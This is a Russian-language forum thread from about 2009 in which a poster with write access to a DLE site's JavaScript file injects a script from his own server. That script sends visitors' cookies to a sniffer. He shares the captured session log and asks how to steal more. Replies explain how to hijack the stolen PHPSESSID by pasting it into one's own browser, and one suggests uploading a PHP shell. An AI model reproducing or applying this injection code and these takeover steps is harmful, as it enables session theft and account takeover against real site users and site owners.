Вообщем есть сайтик, на всех его страницах есть js скрипт
<script src="/js/style.js" type="text/javascript" charset="utf-8"></script>
в этот файл имею возможность записать что угодно. делаю следующее: записываю в начало
<!--
document.writeln("<script src='site/js/c.js' type='text/javascript'></script>");
//-->
этот файл c.js загружается с моего сервера. его содержимое:

img = new Image(); img.src = "site/snf/1x1.gif"+document.cookie;

после чего смотрю лог сниффера и кроме хоста и сессии ничего нету.

Вопрос:) Как стянуть куки, и что вообще интересного можно сделать с сайтом?

PS на сайте DLE стоит

А ты уверен что должно что-то ещё приходить? В смысле - залогиненные юзеры твой жабаскрипт загружают?

да залогиненные. на себе проверял.

кроме хоста и сессии ничего нету


ваще, а это что, сессия уже не куки что ли??? В современно мире пароли в куках только дауны хранят, достаточно идентификации по сессии

ну что толку от PHPSESSID
как хэш украсть?:)

Вообщем есть сайтик, на всех его страницах есть js скрипт
<script src="/js/style.js" type="text/javascript" charset="utf-8"></script>
в этот файл имею возможность записать что угодно.
ничего не сделать. анти-кроссайт-скриптинг заложен изначально в броузеры.
маялся дня три подобной херней в первые и-нет годы.

на домашнем компе - получится. в реалиях сети - увы.

ну что толку от PHPSESSID
как хэш украсть?:)

Ты мою первую мессагу в этой теме читал вообще???? У тебя у самого есть куки от этого сайта? У тебя там что, есть что-то кроме как PHPSESSID???

Дата: [2009-07-29 18:36:46] ||
IP:93.81.141.141
Real IP:
Браузер: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12
Хост: http://сайт.ру
Печеньки: PHPSESSID=hr1jr08mh7633f4on4e4ddb0t6
вот это всё

и? Ты стырил куки, чувак, ты хоцкер! Не шутка. Вставляй стыренную сессию вместо своей (например в опере) - и ты станешь тем, у кого стырил сессию (если она еще не просрочена, у них есть время жизни). Т.е. такие дела надо проворачивать моментально или писать для этого соответствующий скрипт.

ЗЫЖ Кроме шуток, тему можешь закрывать, если у тебя там в куках только сессия, чего ты еще ждешь от жертвы? У неё что, какой-то уникальный компутер или у неё какие-то уникальные отношения с сервом? Нет, такие же, как и у тебя и у любого другого.

На пальтсах - сервер берет сессию, делает скуль-запрос по сессии в базу, происходит идентификация пользователя

На пальтсах - сервер берет сессию, делает скуль-запрос по сессии в базу, происходит идентификация пользователя
Этого было бы достаточно для разъяснения:) а ты поясничать начинаешь, кул хацкер, не все же такие умные как ты, поэтому тут открыта регистрация для всех и все общаются друг с другом и задают какие то глупые и не глупые вопросы.
тему можешь закрывать
не в моей компетенции, так бы закрыл :)

esli est' dostup k failam,zalei php shell i neparsya